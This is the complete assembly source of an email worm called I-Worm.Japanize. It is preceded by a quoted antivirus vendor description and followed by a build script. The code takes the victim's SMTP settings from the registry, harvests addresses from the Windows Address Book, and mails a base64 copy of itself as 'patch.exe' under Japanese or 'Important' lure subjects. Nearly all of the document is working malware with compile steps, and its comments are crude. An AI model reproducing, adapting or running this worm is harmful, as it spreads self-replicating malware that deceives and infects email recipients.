;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ;;; I-Worm.Japanize ;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ;;; ;;; ;;; This has some bugs. ;;; ;;; Here is the TrendMicro description: ;;; ****************************************************************** ;;; http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=WORM_FBOUND.B&VSect=T ;;; Details: ;;;The details of the email this worm arrives with may be as follows: ;;; ;;;To: ;;;Subject: <"Important" or random Japanese text (applicable on Japanese-supported platforms)> ;;;Message Body: ;;;Attachment: patch.exe ;;; ;;;It uses its own SMTP engine and uses the following registry key to retrieve the default SMTP server of the infected system: ;;;HKEY_CURRENT_USER\Software\Microsoft\ ;;;Internet Account Manager\Accounts\00000001 ;;; ;;;It uses the following registry value to locate the infected user's Windows Address Book (WAB) file, from which it retrieves email addresses: ;;;HKEY_CURRENT_USER\Software\Microsoft\WAB\ ;;;WAB4\Wab File Name = "" ;;; ;;;The email arrives with the attachment PATCH.EXE. If the email address of its target ;;;user ends with the domain suffix .jp, the worm randomly selects a phrase from a list of 17 possible Japanese phrases below and uses it as the subject of the email: ;;; ;;; ;;;The English translations of the above Japanese text are as follows: ;;;Re: the issue that you mentioned ;;;Re: important ;;;Re: long time no see ;;;Re: top secret ;;;Re: Hello ;;;Re: important information ;;;Re: data ;;;the issue that you mentioned ;;;important ;;;long time no see ;;;top secret ;;;hello ;;;important information ;;;data ;;;frog ;;;shit ;;;shit ;;; ;;;Otherwise, it uses the subject "Important". ;;; ;;;This non-destructive worm does not drop files or create any registry entries. Its propagation depends on the execution of the file attachment in the email. 
;;; ;;;The following text strings are found in the worm body: ;;; ;;;‘XXXXXXXXXXXXXXXXXXXXXXX’ ;;;‘XXXXX I-Worm.Japanize XXXXX’ ;;;‘XXXXXXXXXXXXXXXXXXXXXXX’ ;;; ;;; .586p .model flat locals jumps ;;; some lazy shit callW macro @@@x extrn @@@x:proc call @@@x endm ofs equ offset dwo equ dword ptr wo equ word ptr by equ byte ptr HKEY_CURRENT_USER EQU 80000001h CRLF equ <13,10> rdtsc equ AF_INET equ 2 SOCK_STREAM equ 1 FILE_ATTRIBUTE_NORMAL EQU 00000080h GENERIC_READ EQU 80000000h GENERIC_WRITE EQU 40000000h PAGE_READONLY EQU 00000002h PAGE_READWRITE EQU 00000004h FILE_MAP_READ EQU 00000004h OPEN_EXISTING EQU 00000003h GHND EQU 042h FILE_SHARE_READ EQU 00000001h FILE_SHARE_WRITE EQU 00000002h ;;; ---------------------------------------------------------------- .data hReg dd ?; registry handle str_SMInternetAccountManager db 'Software\Microsoft\Internet Account Manager',0 str_SMIAccounts db 'Software\Microsoft\Internet Account Manager\Accounts\' AccountIdx db 9 dup(?); account index bufsiz_accountidx dd 9; size str_DMA db 'Default Mail Account',0 str_SMTPNAME db 'SMTP Server',0 str_SMTPEmailAddr db 'SMTP Email Address',0 str_SMWab4 db 'Software\Microsoft\WAB\WAB4\Wab File Name',0 SMTP_Server db 50 dup(?) ; default smtp server bufsiz_SMTPSERVER dd 50 morons_Mailaddr db 256 dup(?) ; mail address of moron :) bufsiz_morons_mailaddr dd 256 wab4_path db 260 dup(?); wab file path bufsiz_wab4_path dd 260 buffer db 1000 dup(?) hwab4file dd ? ; wab4 file handle hwab4map dd ? ; hwab4mapview dd ? ; myfilename db 260 dup(?) ; handle of myself hmyfile dd ? fsize dd ? ; file size hmemout0 dd ? ptr_myself dd ? hmemout dd ? ; globalalloc ptr_base64buf dd ? ; globallock target_mailaddr db 48h dup(?) ; sockaddr_in label byte ; sin_family dw ? sin_port dw ? sin_addr dd ? sin_zero db 8 dup(?) len_sockaddr_in = $ - ofs sockaddr_in sock dd ? ; socket descriptor recv_buffer db 1024 dup(?) 
; recv buffer jflag dd 0 ; japanese or not smtp_HELO db 'HELO localhost',CRLF len_smtp_HELO = $ - ofs smtp_HELO smtp_MAIL_FROM db 'MAIL FROM: ' len_smtp_MAIL_FROM = $ - ofs smtp_MAIL_FROM ;crlf smtp_RCPT_TO db 'RCPT TO: ' len_smtp_RCPT_TO = $ - ofs smtp_RCPT_TO ;crlf smtp_DATA db 'DATA',CRLF len_smtp_DATA = $ - ofs smtp_DATA smtp_BODY_FROM db 'FROM: ' len_smtp_BODY_FROM = $ - ofs smtp_BODY_FROM smtp_BODY_TO db CRLF,'TO: ' len_smtp_BODY_TO = $ - ofs smtp_BODY_TO smtp_BODY_SUBJECT db CRLF,'SUBJECT: Important',CRLF len_smtp_BODY_SUBJECT = $ - ofs smtp_BODY_SUBJECT smtp_DOT_CRLF db '.',CRLF len_smtp_DOT_CRLF = $ - ofs smtp_DOT_CRLF smtp_QUIT db 'QUIT',CRLF len_smtp_QUIT = $ - ofs smtp_QUIT smtp_crlf db CRLF smtp_MIME_h db 'MIME-Version: 1.0',CRLF db 'Content-Type: multipart/mixed; boundary="Boundary-a8dfidaoRadvfuck"',CRLF db CRLF db '--Boundary-a8dfidaoRadvfuck',CRLF db 'Content-Type: text/plain; charset=iso-2022-jp',CRLF db 'Content-Transfer-Encoding: 7bit',CRLF db 'Content-Description: Mail message body',CRLF db CRLF db CRLF ; text db CRLF db '--Boundary-a8dfidaoRadvfuck',CRLF db 'Content-Type: application/x-msdownload; name="patch.exe"',CRLF db 'Content-Disposition: attachment; filename="patch.exe"',CRLF db 'Content-Transfer-Encoding: BASE64',CRLF db CRLF len_smtp_MIME_h = $ - ofs smtp_MIME_h ;; base64 body smtp_MIME_e db CRLF,'--Boundary-a8dfidaoRadvfuck--',CRLF,CRLF len_smtp_MIME_e = $ - ofs smtp_MIME_e r_seed dd 10987293h ; random seed smtp_jsubject_1 db CRLF,'SUBJECT: =?ISO-2022-JP?B?' 
len_smtp_jsubject_1 = $ - ofs smtp_jsubject_1 smtp_jsubject_2 db '?=',CRLF len_smtp_jsubject_2 = $ - ofs smtp_jsubject_2 ;;; japanese subjects table japanese_subjects label byte dd ofs js_01 dd ofs js_02 dd ofs js_03 dd ofs js_04 dd ofs js_05 dd ofs js_06 dd ofs js_07 dd ofs js_08 dd ofs js_09 dd ofs js_10 dd ofs js_11 dd ofs js_12 dd ofs js_13 dd ofs js_14 dd ofs js_15 dd ofs js_16 dd ofs js_17 num_of_jsub = ($ - ofs japanese_subjects)/4 js_01 db 'GyRCPUVNVxsoQg==',0 ; 重要 js_02 db 'UmU6GyRCPUVNVxsoQg==',0; Re:重要 js_03 db 'GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; 重要なお知らせ js_04 db 'UmU6GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; Re:重要なおしらせ js_05 db 'GyRCTmMkTjdvGyhC',0 ; 例の件 js_06 db 'UmU6GyRCTmMkTjdvGyhC',0; Re:例の件 js_07 db 'GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; お久しぶりです js_08 db 'UmU6GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; Re:お久しぶりです js_09 db 'GyRCJDMkcyRLJEEkTxsoQg==',0; こんにちは js_10 db 'UmU6GyRCJDMkcyRLJEEkTxsoQg==',0; Re:こんにちは js_11 db 'GyRCNktIaxsoQg==',0 ; 極秘 js_12 db 'UmU6GyRCNktIaxsoQg==',0; Re:極秘 js_13 db 'GyRCO3FOQRsoQg==',0 ; 資料 js_14 db 'UmU6GyRCO3FOQRsoQg==',0; Re:資料 js_15 db 'GyRCMz8bKEI=',0 ; ウソコ js_16 db 'GyRCJSYlYxsoQlI=',0 ; ウソコ js_17 db 'GyRCJCYkcyQzGyhC',0 ; うんこ .code start: callW GetTickCount mov dwo [r_seed],eax jmp @@go ;; signature :) db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0 db 'XXXXX I-Worm.Japanize XXXXX',0 db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0 @@go: call get_some_info push ofs buffer push 0101h callW WSAStartup test eax,eax jnz exit call open_wab test eax,eax jnz clean_sock call create_base64enc call spread free_mem: push dwo [ptr_base64buf] callW GlobalUnlock push dwo [hmemout] callW GlobalFree close_wab4: push dwo [hwab4file] push dwo [hwab4map] push dwo [hwab4mapview] callW CloseHandle callW CloseHandle callW CloseHandle clean_sock: callW WSACleanup exit: push 0 callW ExitProcess spread: ;; lifewire ;) mov esi,dwo [hwab4mapview] mov ecx,[esi+64h] ; num of addr jecxz @@exit add esi,[esi+60h] ; ptr to addr @@spread_loop: push ecx mov eax,esi cmp by [esi+1],0 jne @@nounicode push 
esi lea edi,target_mailaddr push edi push 48h pop ecx @@1: lodsw stosb loop @@1 pop eax pop esi add esi,20h @@nounicode: call spread2 add esi,24h pop ecx loop @@spread_loop @@exit: ret spread2: push esi mov esi,eax ; now esi=email addr push 0 push 1 push 2 callW socket mov dwo [sock],eax mov wo [sin_family],AF_INET mov ax,25 xchg al,ah mov wo [sin_port],ax push ofs SMTP_Server callW gethostbyname test eax,eax jz @@exit mov eax,[eax+12] mov eax,[eax] mov eax,[eax] mov dwo [sin_addr],eax push len_sockaddr_in lea eax,sockaddr_in push eax push dwo [sock] callW connect test eax,eax jnz @@exit call sendmail @@exit: pop esi ret ;;; --- ;;; reg stuff get_some_info: xor ebx,ebx push ofs hReg push 1 push ebx push ofs str_SMInternetAccountManager push HKEY_CURRENT_USER callW RegOpenKeyExA test eax,eax jnz @@error push ofs bufsiz_accountidx push ofs AccountIdx push ebx push ebx push ofs str_DMA push dwo [hReg] callW RegQueryValueExA test eax,eax jnz @@error push dwo [hReg] callW RegCloseKey push ofs hReg push 1 push ebx push ofs str_SMIAccounts push HKEY_CURRENT_USER callW RegOpenKeyExA test eax,eax jnz @@error push ofs bufsiz_SMTPSERVER push ofs SMTP_Server push ebx push ebx push ofs str_SMTPNAME push dwo [hReg] callW RegQueryValueExA test eax,eax jnz @@error push ofs bufsiz_morons_mailaddr push ofs morons_Mailaddr push ebx push ebx push ofs str_SMTPEmailAddr push dwo [hReg] callW RegQueryValueExA test eax,eax jnz @@error push dwo [hReg] callW RegCloseKey push ofs hReg push 1 push ebx push ofs str_SMWab4 push HKEY_CURRENT_USER callW RegOpenKeyExA test eax,eax jnz @@error push ofs bufsiz_wab4_path push ofs wab4_path push ebx push ebx push ebx push dwo [hReg] callW RegQueryValueExA test eax,eax jnz @@error push dwo [hReg] callW RegCloseKey xor eax,eax ret @@error: xor eax,eax dec eax ret open_wab: xor ebx,ebx push ebx push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push ebx push FILE_SHARE_WRITE push GENERIC_READ push ofs wab4_path callW CreateFileA inc eax jz @@error dec eax mov 
dwo [hwab4file],eax push ebx push ebx push ebx push PAGE_READONLY push ebx push eax callW CreateFileMappingA mov dwo [hwab4map],eax push ebx push ebx push ebx push FILE_MAP_READ push eax callW MapViewOfFile mov dwo [hwab4mapview],eax xor eax,eax ret @@error: xor eax,eax dec eax ret create_base64enc: push 260 push ofs myfilename push 0 callW GetModuleFileNameA xor ebx,ebx push ebx push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push ebx push FILE_SHARE_READ push GENERIC_READ push ofs myfilename callW CreateFileA inc eax jz @@error dec eax mov dwo [hmyfile],eax push 0 push dwo [hmyfile] callW GetFileSize mov dwo [fsize],eax add eax,100h push eax push GHND callW GlobalAlloc mov dwo [hmemout0],eax push eax callW GlobalLock mov dwo [ptr_myself],eax push 0 push ofs recv_buffer push dwo [fsize] push eax push dwo [hmyfile] callW ReadFile test eax,eax jz @@eexit push 0 push dwo [hmyfile] callW GetFileSize push eax ; save size shl eax,1 ; eax*2 push eax push GHND callW GlobalAlloc mov dwo [hmemout],eax push eax callW GlobalLock mov dwo [ptr_base64buf],eax ; pop ebx ; restore size ; push ebx ; size push eax push dwo [ptr_myself] call base64encode push dwo [hmyfile] callW CloseHandle push dwo [ptr_myself] callW GlobalUnlock push dwo [hmemout0] callW GlobalFree xor eax,eax ret @@eexit: push dwo [hmyfile] callW CloseHandle push dwo [ptr_myself] callW GlobalUnlock push dwo [hmemout0] callW GlobalFree @@error: xor eax,eax dec eax ret base64encode proc pascal arg @@src arg @@dest arg @@srclen mov esi,dwo [@@src] mov edi,dwo [@@dest] @@b64loop: xor eax,eax cmp dwo [@@srclen],1 jne @@srclen2 lodsb push 2 pop ecx mov edx,03D3Dh ; == dec dwo [@@srclen] jmp @@b64next @@srclen2: cmp dwo [@@srclen],2 jne @@srclen3 lodsw push 3 pop ecx push 03dh pop edx sub dwo [@@srclen],2 jmp @@b64next @@srclen3: lodsd push 4 pop ecx xor edx,edx dec esi sub dwo [@@srclen],3 @@b64next: bswap eax @@b64n_loop: mov ebx,eax and eax,0FC000000h rol eax,6 mov al,[@@b64table + eax] stosb mov eax,ebx shl eax,6 dec 
ecx jnz @@b64n_loop cmp dwo [@@srclen],0 ja @@b64loop mov eax,edx stosd ret @@b64table db "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" endp g_send: ;; in ;; ecx = size ;; esi = ptr to data ;; out ;; eax = ret value of send() push 0 push ecx push esi push dwo [sock] callW send ret g_recv: ;; out ;; error -> eax=-1 success -> eax = 0 @@again: push 0 push 1024 push ofs recv_buffer push dwo [sock] callW recv inc eax jz @@recv_error cmp eax,1024 jz @@again xor eax,eax ret @@recv_error: xor eax,eax dec eax ret sendmail: ;; yea. lame routine ;) push esi ; mail addr mov dwo [jflag],0 ; flag for .jp ;; call g_recv ;; lea esi,smtp_HELO mov ecx,len_smtp_HELO call g_send call g_recv ;; lea esi,smtp_MAIL_FROM mov ecx,len_smtp_MAIL_FROM call g_send push ofs morons_Mailaddr callW lstrlen mov ecx,eax lea esi,morons_Mailaddr call g_send mov ecx,2 lea esi,smtp_crlf call g_send call g_recv ;; mov ecx,len_smtp_RCPT_TO lea esi,smtp_RCPT_TO call g_send pop esi push esi push esi callW lstrlen push eax ; save mov ecx,eax call g_send mov ecx,2 lea esi,smtp_crlf call g_send call g_recv ;; .jp? pop eax ; len of mail address pop esi push esi ; mail address add esi,eax sub esi,3 cmp dwo [esi],00706a2eh ; .jp? 
jne @@1 inc dwo [jflag] @@1: ;; lea esi,smtp_DATA mov ecx,len_smtp_DATA call g_send call g_recv ;; lea esi,smtp_BODY_FROM mov ecx,len_smtp_BODY_FROM call g_send push ofs morons_Mailaddr callW lstrlen mov ecx,eax lea esi,morons_Mailaddr call g_send lea esi,smtp_BODY_TO mov ecx,len_smtp_BODY_TO call g_send pop esi push esi push esi callW lstrlen mov ecx,eax call g_send cmp dwo [jflag],0 jnz @@jsubject mov ecx,len_smtp_BODY_SUBJECT lea esi,smtp_BODY_SUBJECT call g_send jmp @@body @@jsubject: ;; gen subject mov ecx,len_smtp_jsubject_1 lea esi,smtp_jsubject_1 call g_send mov esi,(num_of_jsub-1) call rng lea esi,japanese_subjects mov esi,dwo [esi+eax*4] push esi callW lstrlen mov ecx,eax call g_send mov ecx,len_smtp_jsubject_2 lea esi,smtp_jsubject_2 call g_send @@body: lea esi,smtp_MIME_h mov ecx,len_smtp_MIME_h call g_send mov esi,dwo [ptr_base64buf] push esi push esi callW lstrlen pop esi mov ecx,eax call g_send lea esi,smtp_MIME_e mov ecx,len_smtp_MIME_e call g_send mov ecx,len_smtp_DOT_CRLF lea esi,smtp_DOT_CRLF call g_send call g_recv ;; mov ecx,len_smtp_QUIT lea esi,smtp_QUIT call g_send call g_recv pop esi ret rng: ;; in ;; esi = range ;; out ;; eax = random number rdtsc xor eax,edx imul eax,dwo [r_seed] dec eax mov dwo [r_seed],eax xor edx,edx div esi mov eax,edx ret end start ************************************************************************* @ECHO OFF TASM32 /ml /m /z japanize.asm,japanize.obj TLINK32 -x -aa -Tpe japanize.obj,,,%import32.lib DEL *.OBJ